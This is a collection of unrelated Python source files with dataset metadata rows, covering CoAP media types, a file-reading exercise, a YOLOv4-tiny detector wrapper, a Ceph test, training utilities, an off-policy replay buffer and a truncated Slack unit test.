1: 'text/xml',
2: 'text/csv',
3: 'text/html',
21: 'image/gif',
22: 'image/jpeg',
23: 'image/png',
24: 'image/tiff',
25: 'audio/raw',
26: 'video/raw',
40: 'application/link-format',
41: 'application/xml',
42: 'application/octet-stream',
43: 'application/rdf+xml',
44: 'application/soap+xml',
45: 'application/atom+xml',
46: 'application/xmpp+xml',
47: 'application/exi',
48: 'application/x-bxml',
49: 'application/fastinfoset',
50: 'application/json',
1541 : 'application/vnd.oma.lwm2m+text',
1542 : 'application/vnd.oma.lwm2m+tlv',
1543 : 'application/vnd.oma.lwm2m+json',
1544 : 'application/vnd.oma.lwm2m+opaque'}
"""A map from CoAP-assigned integral codes to Internet media type descriptions."""
# Build the reverse map with items() so this works on both Python 2.7 and 3
# (the original iterkeys()/itervalues() calls are Python 2 only).
media_types_rev = {v: k for k, v in media_types.items()}
"""A map from Internet media type descriptions to the corresponding
CoAP-assigned integral code."""
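# Example round trip (illustrative): media_types[50] == 'application/json'
# and the reverse lookup recovers the code.
assert media_types_rev['application/json'] == 50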
| 34.160494 | 82 | 0.613119 | 698 | 5,534 | 4.80086 | 0.43553 | 0.016115 | 0.028648 | 0.026261 | 0.075201 | 0.060877 | 0.060877 | 0.060877 | 0.060877 | 0.060877 | 0 | 0.090303 | 0.295627 | 5,534 | 161 | 83 | 34.372671 | 0.769369 | 0.286773 | 0 | 0 | 0 | 0 | 0.262718 | 0.072513 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11cf3e20022175afbe88d52fde2ebd6a82eea9a | 2,879 | py | Python | Python-for-Data-Science/code.py | hirani22/greyatom-python-for-data-science | 17890457d27c33c4eedce23479c0ee2e158674c7 | [
"MIT"
] | null | null | null | Python-for-Data-Science/code.py | hirani22/greyatom-python-for-data-science | 17890457d27c33c4eedce23479c0ee2e158674c7 | [
"MIT"
] | null | null | null | Python-for-Data-Science/code.py | hirani22/greyatom-python-for-data-science | 17890457d27c33c4eedce23479c0ee2e158674c7 | [
"MIT"
] | null | null | null |
# --------------
#Code starts here
#Function to read file
def read_file(path):
    file = open(path, 'r')
    sentence = file.read()
    file.close()
    return sentence
#Opening of the file located in the path in 'read' mode
#Reading of the first line of the file and storing it in a variable
#Closing of the file
#Returning the first line of the file
#Calling the function to read file
sample_message = read_file(file_path)
#Printing the line of the file
print(sample_message)
message_1 = read_file(file_path_1)
message_2 = read_file(file_path_2)
print(message_1)
print(message_2)
#Function to fuse message
def fuse_msg(message_a, message_b):
    quotient = int(message_b) // int(message_a)
    return str(quotient)
secret_msg_1 = fuse_msg(message_1, message_2)
print(secret_msg_1)
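# Quick worked example of the integer-division fuse (illustrative):
# int("10") // int("2") == 5, returned as the string "5".
assert fuse_msg("2", "10") == "5"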
# Calling the function to read file
message_3 = read_file(file_path_3)
# Printing the message
print(message_3)
#Function to substitute the message
def substitute_msg(message_c):
    if message_c == "Red":
        sub = "Army General"
    elif message_c == "Green":
        sub = "Data Scientist"
    elif message_c == "Blue":
        sub = "Marine Biologist"
    else:
        sub = ""  # guard against unknown colours so `sub` is always defined
    return sub
# Calling the function to substitute the message
secret_msg_2 = substitute_msg(message_3)
print(secret_msg_2)
message_4=read_file(file_path_4)
message_5=read_file(file_path_5)
print(message_4)
print(message_5)
#Function to compare message
def compare_msg(message_d, message_e):
    a_list = message_d.split()
    b_list = message_e.split()
    # Comparing the elements from both the lists
    c_list = []
    for i in a_list:
        if i not in b_list:
            c_list.append(i)
    final_msg = " ".join(c_list)
    return final_msg
secret_msg_3=compare_msg(message_4,message_5)
print(secret_msg_3)
#Calling the function to read file
message_6=read_file(file_path_6)
print(message_6)
#Function to filter message
def extract_msg(message_f):
    a_list = message_f.split()
    even_word = lambda x: len(x) % 2 == 0
    b_list = list(filter(even_word, a_list))
    final_msg = " ".join(b_list)
    return final_msg
# Calling the function to extract the message
secret_msg_4 = extract_msg(message_6)
print(secret_msg_4)
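# Quick worked example of the even-length-word filter (illustrative):
# "a" (1 letter) is dropped; "this", "is" and "test" have even lengths.
assert extract_msg("this is a test") == "this is test"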
#Secret message parts in the correct order
message_parts=[secret_msg_3, secret_msg_1, secret_msg_4, secret_msg_2]
secret_msg=" ".join(message_parts)
# define the path where the combined secret message will be written
final_path = user_data_dir + '/secret_message.txt'
#Combine the secret message parts into a single complete secret message
#Function to write inside a file
def write_file(secret_msg, path):
    file = open(path, 'a+')
    file.write(secret_msg)
    file.close()
write_file(secret_msg, final_path)
print(secret_msg)
#Calling the function to write inside the file
#Printing the entire secret message
#Code ends here
| 24.818966 | 72 | 0.712053 | 460 | 2,879 | 4.197826 | 0.226087 | 0.079234 | 0.050751 | 0.065251 | 0.139824 | 0.126359 | 0.090109 | 0.038322 | 0 | 0 | 0 | 0.016515 | 0.200764 | 2,879 | 115 | 73 | 25.034783 | 0.822686 | 0.303578 | 0 | 0.032258 | 0 | 0 | 0.042359 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0 | 0 | 0 | 0.177419 | 0.193548 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11d6247f15795a00b7ddaf410341128ee666804 | 2,259 | py | Python | python/carView/yolo4tiny/yololib.py | ai-driver-III/AI-Driver | 3bae140980507543dd735abbca4aea57a682a2fc | [
"MIT"
] | null | null | null | python/carView/yolo4tiny/yololib.py | ai-driver-III/AI-Driver | 3bae140980507543dd735abbca4aea57a682a2fc | [
"MIT"
] | null | null | null | python/carView/yolo4tiny/yololib.py | ai-driver-III/AI-Driver | 3bae140980507543dd735abbca4aea57a682a2fc | [
"MIT"
] | null | null | null | import cv2
import numpy as np
import multiprocessing as mp
class Yoylv4Tiny():
def __init__(self):
CONFIG = 'python/carView/yolo4tiny/yolov4-tiny.cfg'
WEIGHT = 'python/carView/yolo4tiny/yolov4-tiny.weights'
NAMES = 'python/carView/yolo4tiny/coco.names'
# 讀取物件名稱以及設定外框顏色
with open(NAMES, 'r') as f:
names = [line.strip() for line in f.readlines()]
colors = np.random.uniform(0, 255, size=(len(names), 3))
# 設定神經網路
net = cv2.dnn.readNet(CONFIG, WEIGHT)
model = cv2.dnn_DetectionModel(net)
model.setInputParams(size=(416, 416), scale=1/255.0)
# YOLO 要對調顏色
model.setInputSwapRB(True)
self.model = model
self.names = names
self.colors = colors
# return model, names, colors
def nnProcess(self, image, model=None):
if model==None:
model = self.model
classes, confs, boxes = model.detect(image, 0.6, 0.3)
objPts = []
for box in boxes:
x, y, w , h = box
objPts.append([x+w/2, y+h])
return classes, confs, boxes, objPts
def drawBox(self, image, classes, confs, boxes, names=None, colors=None):
if names==None:
names = self.names
if colors==None:
colors = self.colors
new_image = image.copy()
for (classid, conf, box) in zip(classes, confs, boxes):
x, y, w , h = box
label = '{}: {:.2f}'.format(names[int(classid)], float(conf))
color = colors[int(classid)]
cv2.rectangle(new_image, (x, y), (x + w, y + h), color, 2)
cv2.putText(new_image, label, (x, y - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, color, 2
)
return new_image
def getObjectInfo(self, classes, confs, boxs, names=None):
if names==None:
names = self.names
returnLabel = []
returnBox = []
for (classid, conf, box) in zip(classes, confs, boxs):
x, y, w, h = box
label = '{}#{:.2f}'.format(names[int(classid)], float(conf))
returnLabel.append(label)
returnBox.append([x, y, w, h])
return returnLabel, returnBox
| 35.857143 | 77 | 0.550243 | 277 | 2,259 | 4.447653 | 0.34657 | 0.058442 | 0.055195 | 0.012987 | 0.239448 | 0.1875 | 0.173701 | 0.126623 | 0.071429 | 0.071429 | 0 | 0.026728 | 0.320938 | 2,259 | 62 | 78 | 36.435484 | 0.776402 | 0.02656 | 0 | 0.132075 | 0 | 0 | 0.063355 | 0.054239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0 | 0.056604 | 0 | 0.207547 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11e68168c063438274762d27c8b448191016095 | 2,127 | py | Python | tests/cephfs/cephfs_vol_management/cephfs_vol_mgmt_create_vol_component_exist_name.py | julpark-rh/cephci | 3796668e8dcfc5851f387c47ff0b459d495a40c7 | [
"MIT"
] | null | null | null | tests/cephfs/cephfs_vol_management/cephfs_vol_mgmt_create_vol_component_exist_name.py | julpark-rh/cephci | 3796668e8dcfc5851f387c47ff0b459d495a40c7 | [
"MIT"
] | null | null | null | tests/cephfs/cephfs_vol_management/cephfs_vol_mgmt_create_vol_component_exist_name.py | julpark-rh/cephci | 3796668e8dcfc5851f387c47ff0b459d495a40c7 | [
"MIT"
] | null | null | null | import random
import string
import traceback
from tests.cephfs.cephfs_utilsV1 import FsUtils
from utility.log import Log
log = Log(__name__)
def run(ceph_cluster, **kw):
"""
pre-requisites:
1. Create a volume with a name
2. Create a subvolume with a name
3. Create a subvolume group with a name
Test operation:
1. Try to create a volume with the same name
2. Try to create a subvolume with the same name
3. Try to create a subvolume group with the same name
"""
try:
tc = "CEPH-83573428"
log.info(f"Running CephFS tests for BZ-{tc}")
fs_util = FsUtils(ceph_cluster)
config = kw.get("config")
build = config.get("build", config.get("rhbuild"))
clients = ceph_cluster.get_ceph_objects("client")
client1 = clients[0]
fs_details = fs_util.get_fs_info(client1)
if not fs_details:
fs_util.create_fs(client1, "cephfs")
fs_util.auth_list([client1])
fs_util.prepare_clients(clients, build)
random_name = "".join(
random.choice(string.ascii_lowercase + string.digits)
for _ in list(range(5))
)
volume_name = "vol_01" + random_name
subvolume_name = "subvol_01" + random_name
subvolume_group_name = "subvol_group_name_01" + random_name
log.info("Ceph Build number is " + build[0])
fs_util.create_fs(client1, volume_name)
fs_util.create_subvolume(client1, volume_name, subvolume_name)
fs_util.create_subvolumegroup(client1, "cephfs", subvolume_group_name)
output1, err1 = fs_util.create_fs(client1, volume_name, check_ec=False)
output2, err2 = fs_util.create_subvolume(
client1, volume_name, subvolume_name, check_ec=False
)
output3, err3 = fs_util.create_subvolumegroup(
client1, volume_name, subvolume_name, check_ec=False
)
if output1 == 0 or output2 == 0 or output3 == 0:
return 1
return 0
except Exception as e:
log.error(e)
log.error(traceback.format_exc())
return 1
| 33.761905 | 79 | 0.64504 | 287 | 2,127 | 4.560976 | 0.313589 | 0.05042 | 0.064171 | 0.027502 | 0.285714 | 0.166539 | 0.166539 | 0.119175 | 0.077922 | 0 | 0 | 0.031471 | 0.267983 | 2,127 | 62 | 80 | 34.306452 | 0.809249 | 0.133051 | 0 | 0.088889 | 0 | 0 | 0.076111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.111111 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11ee570cc3720e38a308e37c6f8014f32e2bc28 | 2,611 | py | Python | src/misc.py | telemachosc/Face-Recognition | 60c57ad1f7f294ea37be71ae4c73f44ff408e03d | [
"MIT"
] | null | null | null | src/misc.py | telemachosc/Face-Recognition | 60c57ad1f7f294ea37be71ae4c73f44ff408e03d | [
"MIT"
] | null | null | null | src/misc.py | telemachosc/Face-Recognition | 60c57ad1f7f294ea37be71ae4c73f44ff408e03d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 9 12:52:38 2021
@author: telemachos
Miscellaneous functions used when training a model
"""
import json
import os
import numpy as np
from keras.callbacks import LearningRateScheduler
class StrIntEncoder:
@staticmethod
def encode(s: str) -> int:
encode = s.encode('utf-8')
return int.from_bytes(encode, byteorder='big')
@staticmethod
def decode(i: int) -> str:
tobytes = i.to_bytes(((i.bit_length() + 7) // 8), byteorder='big')
return tobytes.decode("utf-8")
def file_exists(name: str) -> str:
if os.path.exists('results/'+name+'.txt'):
ds, num = name.split('_')
hfname = ds+'_'+str(int(num)+1).zfill(3)
if os.path.exists('results/'+hfname+'.txt'):
hfname = file_exists(hfname)
else:
hfname = name
return hfname
def write_history(name: str, h: dict, test_set: list, time: float,
epoch, lr, fnl) -> None:
name = file_exists(name)
with open('results/'+name+'.txt', 'w') as convert_file:
convert_file.write(('-----------------------------------------------'+
'-------------------------------\n'))
convert_file.write(f'{name} EXPERIMENT RESULTS\n')
convert_file.write(('-----------------------------------------------'+
'-------------------------------\n'))
convert_file.write(('Train configuration for that experiment was:\n'+
f'Epochs: {epoch},\nLearning rate: {lr},\n'+
f'Fine tune layers: {fnl}'))
convert_file.write(('Loss and accuracy on train and validation set\n'))
convert_file.write(json.dumps(h, indent=2))
convert_file.write(('\n\n'+
'----------------------------------------------\n'))
convert_file.write('On the test set the loss and accuracy was:\n')
convert_file.write(f'loss: {test_set[0]}, \naccuracy: {test_set[1]}\n')
convert_file.write(('---------------------------------------------\n'+
'\nTotal time for training and evaluating the '+
f'model was\n{time} seconds or {time/60} minutes'))
def step_decay_schedule(initial_lr=1e-3, decay_factor=0.75, step_size=10):
'''
Wrapper function to create a LearningRateScheduler with step decay schedule.
'''
def schedule(epoch):
return initial_lr * (decay_factor ** np.floor(epoch/step_size))
return LearningRateScheduler(schedule) | 34.813333 | 80 | 0.522022 | 298 | 2,611 | 4.469799 | 0.419463 | 0.090841 | 0.12012 | 0.089339 | 0.10961 | 0.04955 | 0.04955 | 0 | 0 | 0 | 0 | 0.015496 | 0.258522 | 2,611 | 75 | 81 | 34.813333 | 0.672521 | 0.079663 | 0 | 0.12766 | 0 | 0 | 0.285714 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12766 | false | 0 | 0.085106 | 0.021277 | 0.340426 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11f0cfd3773469157b52836b08d42b4f17063f4 | 16,873 | py | Python | dopamine/replay_memory/off_policy_replay_buffer.py | pmineiro/dopamine | 6f6077f38d6b2520272dfcf4ec36225d53c17eae | [
"Apache-2.0"
] | null | null | null | dopamine/replay_memory/off_policy_replay_buffer.py | pmineiro/dopamine | 6f6077f38d6b2520272dfcf4ec36225d53c17eae | [
"Apache-2.0"
] | null | null | null | dopamine/replay_memory/off_policy_replay_buffer.py | pmineiro/dopamine | 6f6077f38d6b2520272dfcf4ec36225d53c17eae | [
"Apache-2.0"
] | null | null | null |
# coding=utf-8
"""The standard DQN replay memory + logged probabilities + return vectors/tensors so we can do cool stuff with them
This implementation is an out-of-graph replay memory + in-graph wrapper
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import gzip
import math
import os
import pickle
from absl import logging
import numpy as np
import tensorflow as tf
import gin.tf
from dopamine.replay_memory import circular_replay_buffer
from dopamine.replay_memory.circular_replay_buffer import ReplayElement, STORE_FILENAME_PREFIX, CHECKPOINT_DURATION, invalid_range
@gin.configurable
class OutOfGraphOffPolicyReplayBuffer(circular_replay_buffer.OutOfGraphReplayBuffer):
"""An out-of-graph Replay Buffer with logged probabilities and support for off-policy stuff.
See circular_replay_buffer.py for details.
"""
def __init__(self,
observation_shape,
stack_size,
replay_capacity,
batch_size,
update_horizon=1,
gamma=0.99,
max_sample_attempts=1000,
extra_storage_types=None,
observation_dtype=np.uint8,
terminal_dtype=np.uint8,
action_shape=(),
action_dtype=np.int32,
reward_shape=(),
reward_dtype=np.float32,
subsample_percentage=None,
subsample_seed=None):
"""Initializes OutOfGraphOffPolicyReplayBuffer.
Args:
observation_shape: tuple of ints.
stack_size: int, number of frames to use in state stack.
replay_capacity: int, number of transitions to keep in memory.
batch_size: int.
update_horizon: int, length of update ('n' in n-step update).
gamma: int, the discount factor.
max_sample_attempts: int, the maximum number of attempts allowed to
get a sample.
extra_storage_types: list of ReplayElements defining the type of the extra
contents that will be stored and returned by sample_transition_batch.
observation_dtype: np.dtype, type of the observations. Defaults to
np.uint8 for Atari 2600.
terminal_dtype: np.dtype, type of the terminals. Defaults to np.uint8 for
Atari 2600.
action_shape: tuple of ints, the shape for the action vector. Empty tuple
means the action is a scalar.
action_dtype: np.dtype, type of elements in the action.
reward_shape: tuple of ints, the shape of the reward vector. Empty tuple
means the reward is a scalar.
reward_dtype: np.dtype, type of elements in the reward.
      subsample_percentage: int or None. If set, sampling is restricted to a
        deterministic subset covering roughly this percentage of the buffer;
        indices are selected by hashing them together with subsample_seed.
      subsample_seed: int, seed mixed into the index hash so the subsample
        stays stable across runs.
"""
super(OutOfGraphOffPolicyReplayBuffer, self).__init__(
observation_shape=observation_shape,
stack_size=stack_size,
replay_capacity=replay_capacity,
batch_size=batch_size,
update_horizon=update_horizon,
gamma=gamma,
max_sample_attempts=max_sample_attempts,
extra_storage_types=extra_storage_types,
observation_dtype=observation_dtype,
terminal_dtype=terminal_dtype,
action_shape=action_shape,
action_dtype=action_dtype,
reward_shape=reward_shape,
reward_dtype=reward_dtype)
self._subsample_percentage = None if subsample_percentage is None else int(subsample_percentage)
logging.info('\t subsample percentage: %s', str(self._subsample_percentage))
assert self._subsample_percentage is None or self._subsample_percentage > 0
self._subsample_seed = subsample_seed
# wmax has not been checkpointed.
# If we try to keep track of it here, batch_rl complains it cannot find a checkpoint
# self.wmax = 2
def get_add_args_signature(self):
"""The signature of the add function.
The signature is the same as the one for OutOfGraphReplayBuffer, with an
added probability.
Returns:
list of ReplayElements defining the type of the argument signature needed
by the add function.
"""
parent_add_signature = super(OutOfGraphOffPolicyReplayBuffer,
self).get_add_args_signature()
add_signature = parent_add_signature + [
ReplayElement('prob', (), np.float32)
]
return add_signature
def _add(self, *args):
self._check_args_length(*args)
transition = {}
for i, element in enumerate(self.get_add_args_signature()):
# commented out because wmax was not checkpointed
# if element.name == 'prob':
# prob = args[i]
transition[element.name] = args[i]
# commented out because wmax was not checkpointed
#self.wmax = max(self.wmax, 1.0/prob)
super(OutOfGraphOffPolicyReplayBuffer, self)._add_transition(transition)
def get_transition_elements(self, batch_size=None):
"""Returns a 'type signature' for sample_transition_batch.
Args:
batch_size: int, number of transitions returned. If None, the default
batch_size will be used.
Returns:
signature: A namedtuple describing the method's return type signature.
"""
parent_transition_type = (
super(OutOfGraphOffPolicyReplayBuffer,
self).get_transition_elements(batch_size))
update_horizon = self._update_horizon
batch_size = self._batch_size if batch_size is None else batch_size
trajectory_type = [
ReplayElement('traj_state', (batch_size, update_horizon) + self._state_shape, self._observation_dtype),
ReplayElement('traj_action', (batch_size, update_horizon), np.int32),
ReplayElement('traj_reward', (batch_size, update_horizon), np.float32),
ReplayElement('traj_prob', (batch_size, update_horizon), np.float32),
ReplayElement('traj_discount', (batch_size, update_horizon), np.float32),
]
return parent_transition_type + trajectory_type
def sample_index_batch(self, batch_size):
"""Returns a batch of valid indices sampled uniformly.
Args:
batch_size: int, number of indices returned.
Returns:
list of ints, a batch of valid indices sampled uniformly.
Raises:
RuntimeError: If the batch was not constructed after maximum number of
tries.
"""
if self.is_full():
# add_count >= self._replay_capacity > self._stack_size
min_id = self.cursor() - self._replay_capacity + self._stack_size - 1
max_id = self.cursor() - self._update_horizon
else:
# add_count < self._replay_capacity
min_id = self._stack_size - 1
max_id = self.cursor() - self._update_horizon
if max_id <= min_id:
raise RuntimeError('Cannot sample a batch with fewer than stack size '
'({}) + update_horizon ({}) transitions.'.
format(self._stack_size, self._update_horizon))
indices = []
attempt_count = 0
while (len(indices) < batch_size and
attempt_count < self._max_sample_attempts):
index = np.random.randint(min_id, max_id) % self._replay_capacity
      if self._subsample_percentage is not None:
        # Deterministic subsampling: hash the index together with the seed
        # and keep it only if the hash falls inside the requested percentage
        # bucket, so the kept subset is stable across runs for a given seed.
        def hashit(v):
          # 32-bit integer mixing function (xorshift-multiply), mod 2^31.
v = (((v >> 16) ^ v) * 0x119de1f3) % (1 << 31)
v = (((v >> 16) ^ v) * 0x119de1f3) % (1 << 31)
v = ((v >> 16) ^ v) % (1 << 31)
return v
def hashitseed(v, seed):
return hashit(v + hashit(seed))
hashindex = hashitseed(index, int(self._subsample_seed))
while hashindex % 100 >= self._subsample_percentage:
index = np.random.randint(min_id, max_id) % self._replay_capacity
hashindex = hashitseed(index, int(self._subsample_seed))
if self.is_valid_transition(index):
indices.append(index)
else:
attempt_count += 1
if len(indices) != batch_size:
raise RuntimeError(
'Max sample attempts: Tried {} times but only sampled {}'
' valid indices. Batch size is {}'.
format(self._max_sample_attempts, len(indices), batch_size))
return indices
def sample_transition_batch(self, batch_size=None, indices=None):
"""Returns a batch of transitions (including any extra contents).
If get_transition_elements has been overridden and defines elements not
stored in self._store, an empty array will be returned and it will be
left to the child class to fill it. For example, for the child class
OutOfGraphPrioritizedReplayBuffer, the contents of the
sampling_probabilities are stored separately in a sum tree.
When the transition is terminal next_state_batch has undefined contents.
NOTE: This transition contains the indices of the sampled elements. These
are only valid during the call to sample_transition_batch, i.e. they may
be used by subclasses of this replay buffer but may point to different data
as soon as sampling is done.
Args:
batch_size: int, number of transitions returned. If None, the default
batch_size will be used.
indices: None or list of ints, the indices of every transition in the
batch. If None, sample the indices uniformly.
Returns:
transition_batch: tuple of np.arrays with the shape and type as in
get_transition_elements().
Raises:
ValueError: If an element to be sampled is missing from the replay buffer.
"""
if batch_size is None:
batch_size = self._batch_size
if indices is None:
indices = self.sample_index_batch(batch_size)
assert len(indices) == batch_size
transition_elements = self.get_transition_elements(batch_size)
batch_arrays = self._create_batch_arrays(batch_size)
for batch_element, state_index in enumerate(indices):
trajectory_indices = [(state_index + j) % self._replay_capacity
for j in range(self._update_horizon)]
trajectory_terminals = self._store['terminal'][trajectory_indices]
is_terminal_transition = trajectory_terminals.any()
if not is_terminal_transition:
trajectory_length = self._update_horizon
else:
# np.argmax of a bool array returns the index of the first True.
trajectory_length = np.argmax(trajectory_terminals.astype(np.bool),
0) + 1
next_state_index = state_index + trajectory_length
trajectory_discount_vector = (
self._cumulative_discount_vector[:trajectory_length])
trajectory_states = np.array([self.get_observation_stack(i) for i in trajectory_indices[:trajectory_length]])
trajectory_actions = self.get_range(self._store['action'], state_index,
next_state_index)
trajectory_rewards = self.get_range(self._store['reward'], state_index,
next_state_index)
trajectory_probs = self.get_range(self._store['prob'], state_index,
next_state_index)
# Fill the contents of each array in the sampled batch.
assert len(transition_elements) == len(batch_arrays)
for element_array, element in zip(batch_arrays, transition_elements):
if element.name == 'traj_state':
element_array[batch_element, :trajectory_length] = trajectory_states
element_array[batch_element, trajectory_length:] = 0
elif element.name == 'traj_action':
element_array[batch_element, :trajectory_length] = trajectory_actions
element_array[batch_element, trajectory_length:] = 0
elif element.name == 'traj_reward':
element_array[batch_element, :trajectory_length] = trajectory_rewards
element_array[batch_element, trajectory_length:] = 0
elif element.name == 'traj_prob':
element_array[batch_element,:trajectory_length] = trajectory_probs
element_array[batch_element,trajectory_length:] = 1
elif element.name == 'traj_discount':
element_array[batch_element,:trajectory_length] = trajectory_discount_vector
element_array[batch_element,trajectory_length:] = 0
elif element.name == 'state':
element_array[batch_element] = self.get_observation_stack(state_index)
elif element.name == 'reward':
# compute the discounted sum of rewards in the trajectory.
element_array[batch_element] = np.sum(
trajectory_discount_vector * trajectory_rewards, axis=0)
elif element.name == 'next_state':
element_array[batch_element] = self.get_observation_stack(
(next_state_index) % self._replay_capacity)
        elif element.name in ('next_action', 'next_reward'):
          # NOTE: lstrip('next_') strips a *character set*, not the prefix;
          # it works here only because 'action' and 'reward' do not start
          # with any of the characters in 'next_'.
          element_array[batch_element] = (
              self._store[element.name.lstrip('next_')][(next_state_index) %
                                                        self._replay_capacity])
elif element.name == 'terminal':
element_array[batch_element] = is_terminal_transition
elif element.name == 'indices':
element_array[batch_element] = state_index
elif element.name in self._store.keys():
element_array[batch_element] = (
self._store[element.name][state_index])
# We assume the other elements are filled in by the subclass.
return batch_arrays
@gin.configurable(blacklist=['observation_shape', 'stack_size',
'update_horizon', 'gamma'])
class WrappedOffPolicyReplayBuffer(
circular_replay_buffer.WrappedReplayBuffer):
"""Wrapper of OutOfGraphOffPolicyReplayBuffer with in-graph sampling.
Usage:
* To add a transition: Call the add function.
* To sample a batch: Query any of the tensors in the transition dictionary.
Every sess.run that requires any of these tensors will
sample a new transition.
"""
def __init__(self,
observation_shape,
stack_size,
use_staging=False,
replay_capacity=1000000,
batch_size=32,
update_horizon=1,
gamma=0.99,
wrapped_memory=None,
max_sample_attempts=1000,
extra_storage_types=None,
observation_dtype=np.uint8,
terminal_dtype=np.uint8,
action_shape=(),
action_dtype=np.int32,
reward_shape=(),
reward_dtype=np.float32):
"""Initializes WrappedOffPolicyReplayBuffer.
Args:
observation_shape: tuple of ints.
stack_size: int, number of frames to use in state stack.
use_staging: bool, when True it would use a staging area to prefetch
the next sampling batch.
replay_capacity: int, number of transitions to keep in memory.
batch_size: int.
update_horizon: int, length of update ('n' in n-step update).
gamma: int, the discount factor.
wrapped_memory: The 'inner' memory data structure. If None, use the
default prioritized replay.
max_sample_attempts: int, the maximum number of attempts allowed to
get a sample.
extra_storage_types: list of ReplayElements defining the type of the extra
contents that will be stored and returned by sample_transition_batch.
observation_dtype: np.dtype, type of the observations. Defaults to
np.uint8 for Atari 2600.
terminal_dtype: np.dtype, type of the terminals. Defaults to np.uint8 for
Atari 2600.
action_shape: tuple of ints, the shape for the action vector. Empty tuple
means the action is a scalar.
action_dtype: np.dtype, type of elements in the action.
reward_shape: tuple of ints, the shape of the reward vector. Empty tuple
means the reward is a scalar.
reward_dtype: np.dtype, type of elements in the reward.
Raises:
ValueError: If update_horizon is not positive.
ValueError: If discount factor is not in [0, 1].
"""
if wrapped_memory is None:
wrapped_memory = OutOfGraphOffPolicyReplayBuffer(
observation_shape, stack_size, replay_capacity, batch_size,
update_horizon, gamma, max_sample_attempts,
extra_storage_types=extra_storage_types,
observation_dtype=observation_dtype)
super(WrappedOffPolicyReplayBuffer, self).__init__(
observation_shape,
stack_size,
use_staging,
replay_capacity,
batch_size,
update_horizon,
gamma,
wrapped_memory=wrapped_memory,
extra_storage_types=extra_storage_types,
observation_dtype=observation_dtype,
terminal_dtype=terminal_dtype,
action_shape=action_shape,
action_dtype=action_dtype,
reward_shape=reward_shape,
reward_dtype=reward_dtype)
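# Minimal usage sketch (hypothetical, not part of the original module): the
# shapes and the dummy transition below are illustrative only. Note the extra
# trailing `prob` argument required by get_add_args_signature() above.
def _example_fill_and_sample():
  buf = OutOfGraphOffPolicyReplayBuffer(
      observation_shape=(4, 4), stack_size=1,
      replay_capacity=100, batch_size=2, update_horizon=1)
  frame = np.zeros((4, 4), dtype=np.uint8)
  for _ in range(10):
    buf.add(frame, 0, 1.0, 0, 1.0)  # observation, action, reward, terminal, prob
  return buf.sample_transition_batch()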
| 41.661728 | 130 | 0.673502 | 2,062 | 16,873 | 5.265276 | 0.154219 | 0.030671 | 0.026619 | 0.037579 | 0.449572 | 0.410611 | 0.3734 | 0.319517 | 0.298886 | 0.280648 | 0 | 0.009239 | 0.255912 | 16,873 | 404 | 131 | 41.764851 | 0.855516 | 0.339951 | 0 | 0.288889 | 0 | 0 | 0.041854 | 0 | 0 | 0 | 0.001873 | 0 | 0.013333 | 1 | 0.04 | false | 0 | 0.062222 | 0.004444 | 0.137778 | 0.004444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1236c762490740a9e18dacf8a02df19f37f0070 | 1,376 | py | Python | tests/test_libslack.py | umccr/libumccr | e08ca1fdf8db72d6ea6e17442dc1bf1fb304243d | [
"MIT"
] | null | null | null | tests/test_libslack.py | umccr/libumccr | e08ca1fdf8db72d6ea6e17442dc1bf1fb304243d | [
"MIT"
] | 5 | 2021-11-04T03:15:37.000Z | 2021-11-04T03:32:32.000Z | tests/test_libslack.py | umccr/libumccr | e08ca1fdf8db72d6ea6e17442dc1bf1fb304243d | [
"MIT"
] | null | null | null | import os
from datetime import datetime
from unittest import TestCase
from mockito import when, mock, verify, unstub
from libumccr import libslack
class LibSlackUnitTests(TestCase):
def setUp(self) -> None:
os.environ['SLACK_CHANNEL'] = "#mock"
def tearDown(self) -> None:
del os.environ['SLACK_CHANNEL']
unstub()
def test_call_slack_webhook(self):
"""
python -m unittest tests.test_libslack.LibSlackUnitTests.test_call_slack_webhook
"""
mock_sender = "mock sender"
mock_topic = "mock topic"
mock_attachments = [
{
"title": "mock attachement",
"text": "test",
},
{
"title": "datetime",
